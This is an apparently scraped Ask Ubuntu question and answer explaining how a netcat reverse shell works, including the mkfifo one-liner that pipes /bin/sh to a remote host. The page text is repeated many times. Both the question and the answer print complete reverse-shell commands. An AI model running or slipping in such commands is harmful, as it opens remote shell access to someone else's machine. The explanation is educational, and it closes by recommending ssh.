How does this command work? (reverse shell)





.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty{ margin-bottom:0;
}







2















There was a simple way to connect two systems and getting a shell using nc command as below.




machine A to listen




nc -nlvp 4444



machine B to connect




nc 192.168.4.4 4444 -e /bin/bash


However the -e option is no more, The man pages recommends to follow as below to execute commands




machine A to listen




nc -nlvp 4444



machine B to connect




rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.4.4 4444 >/tmp/f


I do know the concepts behind mkfifo(unamed pipes) and how redirection and piping works. But it still confuses me.










share|improve this question































    2















    There was a simple way to connect two systems and getting a shell using nc command as below.




    machine A to listen




    nc -nlvp 4444



    machine B to connect




    nc 192.168.4.4 4444 -e /bin/bash


    However the -e option is no more, The man pages recommends to follow as below to execute commands




    machine A to listen




    nc -nlvp 4444



    machine B to connect




    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.4.4 4444 >/tmp/f


    I do know the concepts behind mkfifo(unamed pipes) and how redirection and piping works. But it still confuses me.










    share|improve this question



























      2












      2








      2








      There was a simple way to connect two systems and getting a shell using nc command as below.




      machine A to listen




      nc -nlvp 4444



      machine B to connect




      nc 192.168.4.4 4444 -e /bin/bash


      However the -e option is no more, The man pages recommends to follow as below to execute commands




      machine A to listen




      nc -nlvp 4444



      machine B to connect




      rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.4.4 4444 >/tmp/f


      I do know the concepts behind mkfifo(unamed pipes) and how redirection and piping works. But it still confuses me.










      share|improve this question
















      There was a simple way to connect two systems and getting a shell using nc command as below.




      machine A to listen




      nc -nlvp 4444



      machine B to connect




      nc 192.168.4.4 4444 -e /bin/bash


      However the -e option is no more, The man pages recommends to follow as below to execute commands




      machine A to listen




      nc -nlvp 4444



      machine B to connect




      rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.4.4 4444 >/tmp/f


      I do know the concepts behind mkfifo(unamed pipes) and how redirection and piping works. But it still confuses me.







      command-line networking bash netcat






      share|improve this question















      share|improve this question













      share|improve this question




      share|improve this question








      edited Mar 26 at 1:22









      Sergiy Kolodyazhnyy

      74.9k9155326




      74.9k9155326










      asked Mar 21 at 5:47









      GoronGoron

      1669




      1669






















          1 Answer
          1






          active

          oldest

          votes


















          1














          Let's think in standard streams, stdin and stderr for a minute.



          nc 192.168.4.4 4444 >/tmp/f


          The stdout stream of nc gets duplicated to /tmp/f fifo, which means whatever it receives from the other machine over the network goes there. So where does stdin comes from ? From /bin/sh -i 2>&1. As far as nc is concerned, it just has to send that data back to the other machine.



          Well, what does /bin/sh -i do ? It invokes interactive shell - the one where you type commands and print output to stdout. The user@host prompt is typically (if not always) printed to stderr, but we need to send that to remote machine, hence 2>&1 redirection is applied to send the prompt via pipe. Well, we can't use stdout to print the output - the shell has to send that to nc 192.168.4.4 4444 to be sent over the network. We can't read stdin either - cat /tmp/f will be using that to print whatever command is issued from the machine A in your example. Piping commands to the interactive shell isn't anything particularly special - when stdin is rewired an application isn't aware of it unless it is actively checking.



          $ echo 'df' | sh -i
          $ Filesystem 1K-blocks Used Available Use% Mounted on
          udev 4000944 0 4000944 0% /dev
          tmpfs 805348 1400 803948 1% /run
          /dev/sda1 28717732 25907684 1328188 96% /
          tmpfs 4026732 97496 3929236 3% /dev/shm
          tmpfs 5120 4 5116 1% /run/lock
          tmpfs 4026732 0 4026732 0% /sys/fs/cgroup
          /dev/sdb1 115247656 99204832 10165476 91% /mnt/ubuntu
          tmpfs 805344 32 805312 1% /run/user/1000
          $
          sh: 1: Cannot set tty process group (No such process)


          So to put it briefly, shell reads commands from fifo and sends commands over the network via pipe to nc. The commands sent from remote to local shell are written by nc to the fifo. And so the loop goes on and on.



          NOTE: nc doesn't provide any security of information - commands and their output are transmitted over network in plain text and an attacker could potentially modify the data between machine A and B. If you do want to have secure way to issue commands to the remote machine via its shell - use ssh. The ssh protocol was designed specifically for that purpose.






          share|improve this answer


























            Your Answer








            StackExchange.ready(function() {
            var channelOptions = {
            tags: "".split(" "),
            id: "89"
            };
            initTagRenderer("".split(" "), "".split(" "), channelOptions);

            StackExchange.using("externalEditor", function() {
            // Have to fire editor after snippets, if snippets enabled
            if (StackExchange.settings.snippets.snippetsEnabled) {
            StackExchange.using("snippets", function() {
            createEditor();
            });
            }
            else {
            createEditor();
            }
            });

            function createEditor() {
            StackExchange.prepareEditor({
            heartbeatType: 'answer',
            autoActivateHeartbeat: false,
            convertImagesToLinks: true,
            noModals: true,
            showLowRepImageUploadWarning: true,
            reputationToPostImages: 10,
            bindNavPrevention: true,
            postfix: "",
            imageUploader: {
            brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
            contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
            allowUrls: true
            },
            onDemand: true,
            discardSelector: ".discard-answer"
            ,immediatelyShowMarkdownHelp:true
            });


            }
            });














            draft saved

            draft discarded


















            StackExchange.ready(
            function () {
            StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2faskubuntu.com%2fquestions%2f1127431%2fhow-does-this-command-work-reverse-shell%23new-answer', 'question_page');
            }
            );

            Post as a guest















            Required, but never shown

























            1 Answer
            1






            active

            oldest

            votes








            1 Answer
            1






            active

            oldest

            votes









            active

            oldest

            votes






            active

            oldest

            votes









            1














            Let's think in standard streams, stdin and stderr for a minute.



            nc 192.168.4.4 4444 >/tmp/f


            The stdout stream of nc gets duplicated to /tmp/f fifo, which means whatever it receives from the other machine over the network goes there. So where does stdin comes from ? From /bin/sh -i 2>&1. As far as nc is concerned, it just has to send that data back to the other machine.



            Well, what does /bin/sh -i do ? It invokes interactive shell - the one where you type commands and print output to stdout. The user@host prompt is typically (if not always) printed to stderr, but we need to send that to remote machine, hence 2>&1 redirection is applied to send the prompt via pipe. Well, we can't use stdout to print the output - the shell has to send that to nc 192.168.4.4 4444 to be sent over the network. We can't read stdin either - cat /tmp/f will be using that to print whatever command is issued from the machine A in your example. Piping commands to the interactive shell isn't anything particularly special - when stdin is rewired an application isn't aware of it unless it is actively checking.



            $ echo 'df' | sh -i
            $ Filesystem 1K-blocks Used Available Use% Mounted on
            udev 4000944 0 4000944 0% /dev
            tmpfs 805348 1400 803948 1% /run
            /dev/sda1 28717732 25907684 1328188 96% /
            tmpfs 4026732 97496 3929236 3% /dev/shm
            tmpfs 5120 4 5116 1% /run/lock
            tmpfs 4026732 0 4026732 0% /sys/fs/cgroup
            /dev/sdb1 115247656 99204832 10165476 91% /mnt/ubuntu
            tmpfs 805344 32 805312 1% /run/user/1000
            $
            sh: 1: Cannot set tty process group (No such process)


            So to put it briefly, shell reads commands from fifo and sends commands over the network via pipe to nc. The commands sent from remote to local shell are written by nc to the fifo. And so the loop goes on and on.



            NOTE: nc doesn't provide any security of information - commands and their output are transmitted over network in plain text and an attacker could potentially modify the data between machine A and B. If you do want to have secure way to issue commands to the remote machine via its shell - use ssh. The ssh protocol was designed specifically for that purpose.






            share|improve this answer






























              1














              Let's think in standard streams, stdin and stderr for a minute.



              nc 192.168.4.4 4444 >/tmp/f


              The stdout stream of nc gets duplicated to /tmp/f fifo, which means whatever it receives from the other machine over the network goes there. So where does stdin comes from ? From /bin/sh -i 2>&1. As far as nc is concerned, it just has to send that data back to the other machine.



              Well, what does /bin/sh -i do ? It invokes interactive shell - the one where you type commands and print output to stdout. The user@host prompt is typically (if not always) printed to stderr, but we need to send that to remote machine, hence 2>&1 redirection is applied to send the prompt via pipe. Well, we can't use stdout to print the output - the shell has to send that to nc 192.168.4.4 4444 to be sent over the network. We can't read stdin either - cat /tmp/f will be using that to print whatever command is issued from the machine A in your example. Piping commands to the interactive shell isn't anything particularly special - when stdin is rewired an application isn't aware of it unless it is actively checking.



              $ echo 'df' | sh -i
              $ Filesystem 1K-blocks Used Available Use% Mounted on
              udev 4000944 0 4000944 0% /dev
              tmpfs 805348 1400 803948 1% /run
              /dev/sda1 28717732 25907684 1328188 96% /
              tmpfs 4026732 97496 3929236 3% /dev/shm
              tmpfs 5120 4 5116 1% /run/lock
              tmpfs 4026732 0 4026732 0% /sys/fs/cgroup
              /dev/sdb1 115247656 99204832 10165476 91% /mnt/ubuntu
              tmpfs 805344 32 805312 1% /run/user/1000
              $
              sh: 1: Cannot set tty process group (No such process)


              So to put it briefly, shell reads commands from fifo and sends commands over the network via pipe to nc. The commands sent from remote to local shell are written by nc to the fifo. And so the loop goes on and on.



              NOTE: nc doesn't provide any security of information - commands and their output are transmitted over network in plain text and an attacker could potentially modify the data between machine A and B. If you do want to have secure way to issue commands to the remote machine via its shell - use ssh. The ssh protocol was designed specifically for that purpose.






              share|improve this answer




























                1












                1








                1







                Let's think in standard streams, stdin and stderr for a minute.



                nc 192.168.4.4 4444 >/tmp/f


                The stdout stream of nc gets duplicated to /tmp/f fifo, which means whatever it receives from the other machine over the network goes there. So where does stdin comes from ? From /bin/sh -i 2>&1. As far as nc is concerned, it just has to send that data back to the other machine.



                Well, what does /bin/sh -i do ? It invokes interactive shell - the one where you type commands and print output to stdout. The user@host prompt is typically (if not always) printed to stderr, but we need to send that to remote machine, hence 2>&1 redirection is applied to send the prompt via pipe. Well, we can't use stdout to print the output - the shell has to send that to nc 192.168.4.4 4444 to be sent over the network. We can't read stdin either - cat /tmp/f will be using that to print whatever command is issued from the machine A in your example. Piping commands to the interactive shell isn't anything particularly special - when stdin is rewired an application isn't aware of it unless it is actively checking.



                $ echo 'df' | sh -i
                $ Filesystem 1K-blocks Used Available Use% Mounted on
                udev 4000944 0 4000944 0% /dev
                tmpfs 805348 1400 803948 1% /run
                /dev/sda1 28717732 25907684 1328188 96% /
                tmpfs 4026732 97496 3929236 3% /dev/shm
                tmpfs 5120 4 5116 1% /run/lock
                tmpfs 4026732 0 4026732 0% /sys/fs/cgroup
                /dev/sdb1 115247656 99204832 10165476 91% /mnt/ubuntu
                tmpfs 805344 32 805312 1% /run/user/1000
                $
                sh: 1: Cannot set tty process group (No such process)


                So to put it briefly, shell reads commands from fifo and sends commands over the network via pipe to nc. The commands sent from remote to local shell are written by nc to the fifo. And so the loop goes on and on.



                NOTE: nc doesn't provide any security of information - commands and their output are transmitted over network in plain text and an attacker could potentially modify the data between machine A and B. If you do want to have secure way to issue commands to the remote machine via its shell - use ssh. The ssh protocol was designed specifically for that purpose.






                share|improve this answer















                Let's think in standard streams, stdin and stderr for a minute.



                nc 192.168.4.4 4444 >/tmp/f


                The stdout stream of nc gets duplicated to /tmp/f fifo, which means whatever it receives from the other machine over the network goes there. So where does stdin comes from ? From /bin/sh -i 2>&1. As far as nc is concerned, it just has to send that data back to the other machine.



                Well, what does /bin/sh -i do ? It invokes interactive shell - the one where you type commands and print output to stdout. The user@host prompt is typically (if not always) printed to stderr, but we need to send that to remote machine, hence 2>&1 redirection is applied to send the prompt via pipe. Well, we can't use stdout to print the output - the shell has to send that to nc 192.168.4.4 4444 to be sent over the network. We can't read stdin either - cat /tmp/f will be using that to print whatever command is issued from the machine A in your example. Piping commands to the interactive shell isn't anything particularly special - when stdin is rewired an application isn't aware of it unless it is actively checking.



                $ echo 'df' | sh -i
                $ Filesystem 1K-blocks Used Available Use% Mounted on
                udev 4000944 0 4000944 0% /dev
                tmpfs 805348 1400 803948 1% /run
                /dev/sda1 28717732 25907684 1328188 96% /
                tmpfs 4026732 97496 3929236 3% /dev/shm
                tmpfs 5120 4 5116 1% /run/lock
                tmpfs 4026732 0 4026732 0% /sys/fs/cgroup
                /dev/sdb1 115247656 99204832 10165476 91% /mnt/ubuntu
                tmpfs 805344 32 805312 1% /run/user/1000
                $
                sh: 1: Cannot set tty process group (No such process)


                So to put it briefly, shell reads commands from fifo and sends commands over the network via pipe to nc. The commands sent from remote to local shell are written by nc to the fifo. And so the loop goes on and on.



                NOTE: nc doesn't provide any security of information - commands and their output are transmitted over network in plain text and an attacker could potentially modify the data between machine A and B. If you do want to have secure way to issue commands to the remote machine via its shell - use ssh. The ssh protocol was designed specifically for that purpose.







                share|improve this answer














                share|improve this answer



                share|improve this answer








                edited Mar 23 at 1:44

























                answered Mar 21 at 6:43









                Sergiy KolodyazhnyySergiy Kolodyazhnyy

                74.9k9155326




                74.9k9155326






























                    draft saved

                    draft discarded




















































                    Thanks for contributing an answer to Ask Ubuntu!


                    • Please be sure to answer the question. Provide details and share your research!

                    But avoid



                    • Asking for help, clarification, or responding to other answers.

                    • Making statements based on opinion; back them up with references or personal experience.


                    To learn more, see our tips on writing great answers.




                    draft saved


                    draft discarded














                    StackExchange.ready(
                    function () {
                    StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2faskubuntu.com%2fquestions%2f1127431%2fhow-does-this-command-work-reverse-shell%23new-answer', 'question_page');
                    }
                    );

                    Post as a guest















                    Required, but never shown





















































                    Required, but never shown














                    Required, but never shown












                    Required, but never shown







                    Required, but never shown

































                    Required, but never shown














                    Required, but never shown












                    Required, but never shown







                    Required, but never shown







                    Popular posts from this blog

                    數位音樂下載

                    When can things happen in Etherscan, such as the picture below?

                    格利澤436b